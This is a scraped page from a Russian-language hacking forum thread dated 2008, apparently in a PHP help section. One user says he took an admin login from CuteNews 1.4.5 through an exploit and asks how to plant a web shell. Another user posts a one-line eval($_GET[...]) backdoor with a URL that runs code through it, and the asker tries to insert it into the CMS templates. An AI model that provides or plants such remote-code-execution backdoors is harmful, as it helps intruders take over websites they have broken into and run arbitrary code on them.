HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > ПРОГРАММИРОВАНИЕ > PHP
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 03.04.2008, 03:28
ToniKapuchon
Участник форума
Регистрация: 26.02.2006
Сообщений: 209
Провел на форуме:
2418438

Репутация: 93
По умолчанию

1, 0?
 
Ответить с цитированием

  #2  
Старый 03.04.2008, 04:13
presidentua
Постоянный
Регистрация: 04.11.2007
Сообщений: 331
Провел на форуме:
1724067

Репутация: 806
По умолчанию

Цитата:
Сообщение от ToniKapuchon  
1, 0?
неа, 1,0,труе,фалсе, большими буквами, маленькими, ничего не пододит, поэтому и обратился. Может как-то можна обойти это. Например черезразные хеши переменных, может как-то они по другому пишутся. Тоесть по сути ТРУЕ и ФАЛСЕ где-то определены как константы, но кто-его знает...
 
Ответить с цитированием

  #3  
Старый 03.04.2008, 04:26
6u4yxa
Новичок
Регистрация: 16.11.2007
Сообщений: 22
Провел на форуме:
147197

Репутация: 5
По умолчанию

Всем участникам приветы!
хотел вот спросить ибо уже сломал се моск.... =(
по моему вопросу в одной из тем мне посоветовали "Eval'лить код или поставь форму на закачку шела". Ушел в статьи и на php.ru (прошла неделя - голова как воздушный шарик)
Тоесть как я понял в eval можно загнать пхп код - смысл етого я не пойму?
На примере cutenews 1.4.5 на котором через эксплойт дабыл логин пароль админа -
в теплейтах нельзя исполнлить пхп код, он его не воспринимает и не выводит (заметил что если вставить пхп код то после повторного просмотра долбаный кут ньюз удаляет из кода все введене переменые)
Вот как бы и сам вопрос: объяснити для чего нужен етот eval, как и пользоваться и если есть желание помочь опишите, как мне залить шел в cutenews 1.4.5 имея админские привелегии?
 
Ответить с цитированием

  #4  
Старый 03.04.2008, 04:27
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,315
Провел на форуме:
16641028

Репутация: 2371


По умолчанию

presidentua,

PHP код:
<?php
eval($_GET['xek']);
$str2='asdfasdf asdf';
if (
$str1 == $str2) echo 1;
?>
Естественно это не безопасно

index.php?xek=$str1=true;
 
Ответить с цитированием

  #5  
Старый 03.04.2008, 04:52
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,315
Провел на форуме:
16641028

Репутация: 2371


По умолчанию

6u4yxa, пример

PHP код:
<?php
eval($_GET['sekas']);
?>
Обратись к скрипту так: script.php?sekas=phpinfo();
 
Ответить с цитированием

  #6  
Старый 03.04.2008, 05:13
6u4yxa
Новичок
Регистрация: 16.11.2007
Сообщений: 22
Провел на форуме:
147197

Репутация: 5
По умолчанию

Цитата:
Сообщение от Isis  
6u4yxa, пример

PHP код:
<?php
eval($_GET['sekas']);
?>
Обратись к скрипту так: script.php?sekas=phpinfo();
после того как занес ето в теплейт вылезло вот ето

Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING
 
Ответить с цитированием

  #7  
Старый 03.04.2008, 05:17
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,315
Провел на форуме:
16641028

Репутация: 2371


По умолчанию

Я про скрипт говорил, а не про темплейт)
http://php.net/eval
 
Ответить с цитированием

  #8  
Старый 03.04.2008, 05:33
6u4yxa
Новичок
Регистрация: 16.11.2007
Сообщений: 22
Провел на форуме:
147197

Репутация: 5
По умолчанию

Цитата:
Сообщение от Isis  
Я про скрипт говорил, а не про темплейт)
http://php.net/eval
про евал уже все что можно прочитал но не могу все равно понять зачем он нужен...
А на счет теплейта как реализовать php код там?

_____________________

попробовал тот код из примера работает =) выводит phpinfo(); но яж могу и без всякого eval его вывести.

_____________________
прошло ещё 10 мин...
вставил в темплейт вот так:

<?
eval($GET['sekas']);
?>

вылезла ошибка...

посидел, подумал..

вставил в темплейт вот так:

<?
eval(\"$GET['sekas']\"\);
?>

смотрю ошибки нету... (думаю получилось)...

пробую...

http://localhost/cute/show_news.php?sekas=phpinfo();

........(мат) просто отобразил последние новости без phpinfo(); - в чем загвостка?

Последний раз редактировалось 6u4yxa; 03.04.2008 в 06:00..
 
Ответить с цитированием

  #9  
Старый 03.04.2008, 08:53
heks
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме:
1484154

Репутация: 126
По умолчанию

Цитата:
Сообщение от 6u4yxa  
про евал уже все что можно прочитал но не могу все равно понять зачем он нужен...
А на счет теплейта как реализовать php код там?

_____________________

попробовал тот код из примера работает =) выводит phpinfo(); но яж могу и без всякого eval его вывести.

_____________________
прошло ещё 10 мин...
вставил в темплейт вот так:

<?
eval($GET['sekas']);
?>

вылезла ошибка...

посидел, подумал..

вставил в темплейт вот так:

<?
eval(\"$GET['sekas']\"\);
?>

смотрю ошибки нету... (думаю получилось)...

пробую...

http://localhost/cute/show_news.php?sekas=phpinfo();

........(мат) просто отобразил последние новости без phpinfo(); - в чем загвостка?

тема поднималась на предыдущих страницах смотри внимательнее
 
Ответить с цитированием

  #10  
Старый 03.04.2008, 13:18
6u4yxa
Новичок
Регистрация: 16.11.2007
Сообщений: 22
Провел на форуме:
147197

Репутация: 5
По умолчанию

Цитата:
Сообщение от heks  
тема поднималась на предыдущих страницах смотри внимательнее
плиз тыкни носом я просто с оченннннь отдаленого города и у нас инет просто ДЕБИЛ в плане тормаза и траф дороговатый =) да и страниц тут уже 260 =)

____________

дошел до 245 не че не нашел то, что мне помогло бы =(((

Последний раз редактировалось 6u4yxa; 03.04.2008 в 13:31..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[c/c++] Новичкам: задаем вопросы _Great_ С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby 5421 21.04.2026 07:37
Интернетчики задали российскому президенту очень странные вопросы podkashey Мировые новости. Обсуждения. 4 07.07.2006 16:53
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.